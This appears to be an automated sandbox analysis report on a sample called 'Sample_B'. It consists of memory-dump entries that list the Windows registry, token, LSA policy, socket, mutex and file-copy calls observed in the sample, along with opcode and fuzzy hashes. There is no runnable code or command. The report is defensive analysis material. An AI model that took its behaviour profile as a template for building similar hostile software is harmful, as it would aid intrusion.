                                                                                  • API ID:
                                                                                  • String ID: :@lq$\,(
                                                                                  • API String ID: 0-3369258770
                                                                                  • Opcode ID: 2d53211c0ae839db27effe3de078d04188fb99aa16132296e6cdaa406f18b2e9
                                                                                  • Instruction ID: 7456fba5da992c09a197321666154d60330704c43f305e887117bbea3d0ec040
                                                                                  • Opcode Fuzzy Hash: 2d53211c0ae839db27effe3de078d04188fb99aa16132296e6cdaa406f18b2e9
                                                                                  • Instruction Fuzzy Hash: 0791D374E01218CFDB14DFA9C894BADBBB2BF89315F10916AD809AB390DB705D45CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 508 550158-550165 509 550167 508->509 510 55016c-550179 508->510 509->510 526 55017c call a807f8 510->526 527 55017c call a8081e 510->527 512 550182-550225 526->512 527->512
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4b($c(
                                                                                  • API String ID: 0-1040441714
                                                                                  • Opcode ID: 070b441b5526b543cb35c5b8fd520efb267ccc9781c9ed05e14f6b6a5df8f15a
                                                                                  • Instruction ID: d8637903f5520db698dcc36a6690e393bb8d47618d104cb4e24a4ca71a5050de
                                                                                  • Opcode Fuzzy Hash: 070b441b5526b543cb35c5b8fd520efb267ccc9781c9ed05e14f6b6a5df8f15a
                                                                                  • Instruction Fuzzy Hash: 68116334A1221ADFCB04FFB4E84899DB771FF40305B408069D4095B365DB705E19EFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 528 27b729-27b733 529 27b735-27b74c 528->529 530 27b74d-27b75b 528->530 529->530 532 27b77d-27b7af 530->532 533 27b75d-27b77c 530->533 536 27b7b2-27b80a RegQueryValueExW 532->536 533->532 538 27b810-27b826 536->538
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 0027B802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0

Control-flow Graph: function at 27bbf3, calls CreateFileW (basic-block graph omitted)
APIs
• CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0027BCA9
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0

Control-flow Graph: function at 27ab26, calls RegOpenKeyExW (basic-block graph omitted)
APIs
• RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0027ABD5
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0

Control-flow Graph: function at 5d1025, calls accept (basic-block graph omitted)
APIs
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: accept
• String ID:
• API String ID: 3005279540-0

Control-flow Graph: function at 5d0b34, calls GetProcessTimes (basic-block graph omitted)
APIs
• GetProcessTimes.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0BD1
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: ProcessTimes
• String ID:
• API String ID: 1995159646-0

Control-flow Graph: function at 27ac1d, calls RegQueryValueExW (basic-block graph omitted)
APIs
• RegQueryValueExW.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027ACD8
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0

Control-flow Graph: function at 27afcf, calls GetTokenInformation (basic-block graph omitted)
APIs
• GetTokenInformation.KERNELBASE(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027B06C
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0

Control-flow Graph: function at 5d0875, calls CreateMutexW (basic-block graph omitted)
APIs
• CreateMutexW.KERNEL32(?,?), ref: 005D0915
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: CreateMutex
• String ID:
• API String ID: 1964310414-0

Control-flow Graph: function at 5d12dd, calls CreateFileMappingW (basic-block graph omitted)
APIs
• CreateFileMappingW.KERNELBASE(?,00000E40,?,?), ref: 005D138A
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: CreateFileMapping
• String ID:
• API String ID: 524692379-0

Control-flow Graph: function at 27a120, calls WSAStartup (basic-block graph omitted)
APIs
• WSAStartup.WS2_32(?,00000E40,?,?), ref: 0027A1BD
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0

Control-flow Graph: function at 27b2f3, calls LsaOpenPolicy (basic-block graph omitted)
APIs
• LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 0027B38F
Memory Dump Source
• Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
Similarity
• API ID: OpenPolicy
• String ID:
• API String ID: 2030686058-0

APIs
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: FileView
• String ID:
• API String ID: 3314676101-0

APIs
• WSAEventSelect.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D11C6
Memory Dump Source
• Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
Similarity
• API ID: EventSelect
• String ID:
• API String ID: 31538577-0

                                                                                  APIs
                                                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 005D0491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMappingOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1680863896-0
                                                                                  • Opcode ID: 2004f1ffacc7e885737f51dc128fe57719652f5669d649afc9503c751550bea7
                                                                                  • Instruction ID: 9c858f6ec6e6148f4de379c1a744a05b2cce8ff9fbdd1c4dbe61c977351fa39e
                                                                                  • Opcode Fuzzy Hash: 2004f1ffacc7e885737f51dc128fe57719652f5669d649afc9503c751550bea7
                                                                                  • Instruction Fuzzy Hash: 5A2183B1505380AFE721CB55DC45FA6FFE8EF05310F0884ABE9849B292D375A904CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027BD95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: 5e2fce20f23f947e23770353f8ce1ded2c96da61a0ac921474a73d27f1f1a3e1
                                                                                  • Instruction ID: 895e877b188fc42370dbddd599539e9ef90e409935b6ccb6a1f74e041fc621c2
                                                                                  • Opcode Fuzzy Hash: 5e2fce20f23f947e23770353f8ce1ded2c96da61a0ac921474a73d27f1f1a3e1
                                                                                  • Instruction Fuzzy Hash: 4E212CB6409780AFE713CB159C41BA3BFA8EF46320F0981DBF9848B193D224A905C771
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 0027B8BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Socket
                                                                                  • String ID:
                                                                                  • API String ID: 38366605-0
                                                                                  • Opcode ID: f9508c72194587fb03de07c4cbd6ba7162a578100795762779a255c5a837a1f6
                                                                                  • Instruction ID: 76dd9cae13db44ed5b46d19cef4c15364ea8efc037009e9408406c60143b1d4c
                                                                                  • Opcode Fuzzy Hash: f9508c72194587fb03de07c4cbd6ba7162a578100795762779a255c5a837a1f6
                                                                                  • Instruction Fuzzy Hash: EB217E71509384AFE722CF51DC45F96FFA8EF05210F04849EEA898B292D375A918CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 005D2131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExtentPoint32Text
                                                                                  • String ID:
                                                                                  • API String ID: 223599850-0
                                                                                  • Opcode ID: cb11c0791935c65bb7b4eea581eb2be4eb50bed2ec2c1a723f5abdb1fceecba6
                                                                                  • Instruction ID: 8ce8467a2ef62ecf796746cbb03e01494f825a269c199f8a6e857dc40de0ce52
                                                                                  • Opcode Fuzzy Hash: cb11c0791935c65bb7b4eea581eb2be4eb50bed2ec2c1a723f5abdb1fceecba6
                                                                                  • Instruction Fuzzy Hash: 382190715093C09FE722CB65DC55B92BFF4EF17260F0984DBE984CB263D225A808CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0027BCA9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 07e042ddbee56454025f08971c45e8880d556094339ac6ef2ad2437ea1116fe8
                                                                                  • Instruction ID: 905d80c634c149a8b24f0d85db5ea662ba022bc844f067eee329f80876636ce4
                                                                                  • Opcode Fuzzy Hash: 07e042ddbee56454025f08971c45e8880d556094339ac6ef2ad2437ea1116fe8
                                                                                  • Instruction Fuzzy Hash: 8B217C71500700EFEB22DF65CC85B66FBE8EF08710F14846EE9898B252D771E914CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D01FC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: e499e34d51a0c659b41e4dc26a24fdf674cce586f0679c382d1bc7b38fb9a39c
                                                                                  • Instruction ID: 3a6c74a49e69b7cd6a5b00383dce52316b22f510b6f32c1f107b57f7c4a41605
                                                                                  • Opcode Fuzzy Hash: e499e34d51a0c659b41e4dc26a24fdf674cce586f0679c382d1bc7b38fb9a39c
                                                                                  • Instruction Fuzzy Hash: 3E219A72505740AFE722CF55DC44FA2BFF8EF05320F08859BE9899B292C264E909CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • getsockname.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0EFF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: getsockname
                                                                                  • String ID:
                                                                                  • API String ID: 3358416759-0
                                                                                  • Opcode ID: b9ef1fbb125e0beafdfe5462a19bccc75669524301412fbd707d14b3093ba17b
                                                                                  • Instruction ID: d84a1f0b9a0338b2477faefcdf902203398c8f9e2b36f8856b138424c3f4b2e9
                                                                                  • Opcode Fuzzy Hash: b9ef1fbb125e0beafdfe5462a19bccc75669524301412fbd707d14b3093ba17b
                                                                                  • Instruction Fuzzy Hash: 2421C272509380AFE721CF15CC44F96BFA8EF45320F0884ABF948DB292C234A908CB71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0027ABD5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: 2a05ca6c90659c7e8c385dffce74867747833854fed1849c9e2a3d4c712f6d68
                                                                                  • Instruction ID: 668d9b16edcb7f02360bf5df71b6f0049b9a0a0e69e96d1506d5d9bcd6519f22
                                                                                  • Opcode Fuzzy Hash: 2a05ca6c90659c7e8c385dffce74867747833854fed1849c9e2a3d4c712f6d68
                                                                                  • Instruction Fuzzy Hash: 14219D72500304EFFB21DE11DC85FAAFBACEF44760F04855AF9499A241D674E9088AB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027BF31
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: 27ae30d80374333362e92490332815aae8a3e6d6a7c5fdd0ec4699e4b1f39872
                                                                                  • Instruction ID: 4a20bbd4ccad983c89954c7154b59da194227130fb98605f116feae6e39a9fad
                                                                                  • Opcode Fuzzy Hash: 27ae30d80374333362e92490332815aae8a3e6d6a7c5fdd0ec4699e4b1f39872
                                                                                  • Instruction Fuzzy Hash: 4A21C0B2404340EFEB22CF51DC44FA7BFA8EF45720F0485AAF9499B552C275A918CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateMutexW.KERNEL32(?,?), ref: 005D0915
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateMutex
                                                                                  • String ID:
                                                                                  • API String ID: 1964310414-0
                                                                                  • Opcode ID: c2220f1fe504652a80318a81e04e3d3be686eb6ef1942b1f32f7e037fb5f7b1d
                                                                                  • Instruction ID: b231bf83ebe4ea3337236302bfa01557b0ea9afd86e428f6ecc3194a2bfac850
                                                                                  • Opcode Fuzzy Hash: c2220f1fe504652a80318a81e04e3d3be686eb6ef1942b1f32f7e037fb5f7b1d
                                                                                  • Instruction Fuzzy Hash: 43218E71500344AFF720DF29CC85BA6FBE8EF04720F04846BE9498B382D671E904CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LsaOpenPolicy.ADVAPI32(?,00000E40), ref: 0027B38F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: OpenPolicy
                                                                                  • String ID:
                                                                                  • API String ID: 2030686058-0
                                                                                  • Opcode ID: 159e0273822a2e2714fc9e041291de7e2c82b42a681f9041820ebc5dd34e0913
                                                                                  • Instruction ID: 1c929cf71d1e82c5fa8558c984378ed3192f399183dcdb3579f402df7337c53f
                                                                                  • Opcode Fuzzy Hash: 159e0273822a2e2714fc9e041291de7e2c82b42a681f9041820ebc5dd34e0913
                                                                                  • Instruction Fuzzy Hash: 1521D172500304EFFB21DF55DC85F6AFBA8EF04310F0485AAFD48CA241D770A9448A71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 005D0FDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3577187118-0
                                                                                  • Opcode ID: 51820cfc0b2f6f944329d44862f3f5b0770d3810cc40504c4e20da9c95d37ac8
                                                                                  • Instruction ID: 8fa5d840dc351c82f4991400ce8288afe6fea290380fe87b95b4c30ffddb98ed
                                                                                  • Opcode Fuzzy Hash: 51820cfc0b2f6f944329d44862f3f5b0770d3810cc40504c4e20da9c95d37ac8
                                                                                  • Instruction Fuzzy Hash: 0A21C372409384AFEB22CF14CC45F96FFA8EF46310F08849BF9489B192C275A948C765
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 005D14D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 2564024751-0
                                                                                  • Opcode ID: d75b0c9b1d225749dedc5da2b5d4f833886867e7c07f52c1b19e43a4100ee504
                                                                                  • Instruction ID: 4d27660d98723a7713b93110089a5133929df527d8ce52a9f1be65a0f675b80c
                                                                                  • Opcode Fuzzy Hash: d75b0c9b1d225749dedc5da2b5d4f833886867e7c07f52c1b19e43a4100ee504
                                                                                  • Instruction Fuzzy Hash: 5D219F7150A3C09FDB13CB25DC55A92BFB4EF07220F0984DBE8858F663C2659908DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetTokenInformation.KERNELBASE(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027B06C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationToken
                                                                                  • String ID:
                                                                                  • API String ID: 4114910276-0
                                                                                  • Opcode ID: 776ff77d4ab6f4701c5f1a9bb530e8fb42b613eaa10b58d8b64510eed2734113
                                                                                  • Instruction ID: 272b9f8ff1a44c00544cd08b48f50ebaa9a66b46bead7f4e693251817605cecf
                                                                                  • Opcode Fuzzy Hash: 776ff77d4ab6f4701c5f1a9bb530e8fb42b613eaa10b58d8b64510eed2734113
                                                                                  • Instruction Fuzzy Hash: 55119D72500304EFEB21CF61DC85FABBBA8EF04320F14856AF909CA241D670A9488BB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 0027B990
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: 12a5b466bb96595dbb279276b93a17ff77005344d6c512270157316d02999df6
                                                                                  • Instruction ID: bd3c675fc5f479de682a3648e6a6047ffb1145d9b29facf6c8a69af6ae8360b8
                                                                                  • Opcode Fuzzy Hash: 12a5b466bb96595dbb279276b93a17ff77005344d6c512270157316d02999df6
                                                                                  • Instruction Fuzzy Hash: 74219A724093C09FDB22CF61DC45A92BFB4EF17220F0985DAE9888F163C2359959DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,12098A28,00000000,00000000,00000000,00000000), ref: 0027ACD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 77d437fa916467b109fa6bc69a8607dc11908eac73e590672b047ab4fd7b1caa
                                                                                  • Instruction ID: 39789f29b3db6949f52ef5f567a83efb477cddd2735c6f80413814fc60d2d185
                                                                                  • Opcode Fuzzy Hash: 77d437fa916467b109fa6bc69a8607dc11908eac73e590672b047ab4fd7b1caa
                                                                                  • Instruction Fuzzy Hash: C821A972210704EFEB21CF11CC81FAAB7ECEF44720F08C56AE9098B641D670E918CA72
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: accept
                                                                                  • String ID:
                                                                                  • API String ID: 3005279540-0
                                                                                  • Opcode ID: 77b6309789d193bfb95d314b40f1fc724d8c798f18e8a3fc70e5ff00396aa3ad
                                                                                  • Instruction ID: 974d6ecdb0ad7cbfb23644ff5494f86f2a033a30498b7db9d5b89b18fb2a0811
                                                                                  • Opcode Fuzzy Hash: 77b6309789d193bfb95d314b40f1fc724d8c798f18e8a3fc70e5ff00396aa3ad
                                                                                  • Instruction Fuzzy Hash: 25216DB1501744EFF720DF55DC85BA6FBE8EF04320F14846BED488B342D675A944CA66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,?,?), ref: 005D2CB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 181273e3d3b31ea56d32b9c27b48223087f5e68849353a4bf8f9270186a39926
                                                                                  • Instruction ID: 91aa700e2cf88f29a06dad8ce7643513326241e4ce532ffb734f8991474a992b
                                                                                  • Opcode Fuzzy Hash: 181273e3d3b31ea56d32b9c27b48223087f5e68849353a4bf8f9270186a39926
                                                                                  • Instruction Fuzzy Hash: C7219371509380AFE721CF29CC45B56FFA8EF16260F0885ABED45CB252D275EC04DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • OpenFileMappingW.KERNELBASE(?,?), ref: 005D0491
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMappingOpen
                                                                                  • String ID:
                                                                                  • API String ID: 1680863896-0
                                                                                  • Opcode ID: 7ba78153e1ab3e50f5f7df0852af5c62a0339fb90fb12eaae2032a0ad497d8b0
                                                                                  • Instruction ID: 5bbce32e6282d66aca8880e2d5969cd366889743f1c19fed39452b75e620c399
                                                                                  • Opcode Fuzzy Hash: 7ba78153e1ab3e50f5f7df0852af5c62a0339fb90fb12eaae2032a0ad497d8b0
                                                                                  • Instruction Fuzzy Hash: 97216F71500740AFFB20DF65DC85FA6FBA8EF04310F14846BED498B381D675A904CA65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: 12226b9a0bab761fd6865c06df865b2b264a2b9f80beaa8ae732a8dcdc81f59a
                                                                                  • Instruction ID: 1106e8177a5e4dee8330bbd76346cc386438fc18a86cce50c635a71bc1be34c3
                                                                                  • Opcode Fuzzy Hash: 12226b9a0bab761fd6865c06df865b2b264a2b9f80beaa8ae732a8dcdc81f59a
                                                                                  • Instruction Fuzzy Hash: 5B219D72500304EFFB31DF55DC45F96FBE8EF08320F04855AE9899B681D671A905CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 0027B8BA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Socket
                                                                                  • String ID:
                                                                                  • API String ID: 38366605-0
                                                                                  • Opcode ID: 95f06e8b8575317c2afbd1cd227ecac06cc0a9b9a278fafbc6015a6de1d4cc69
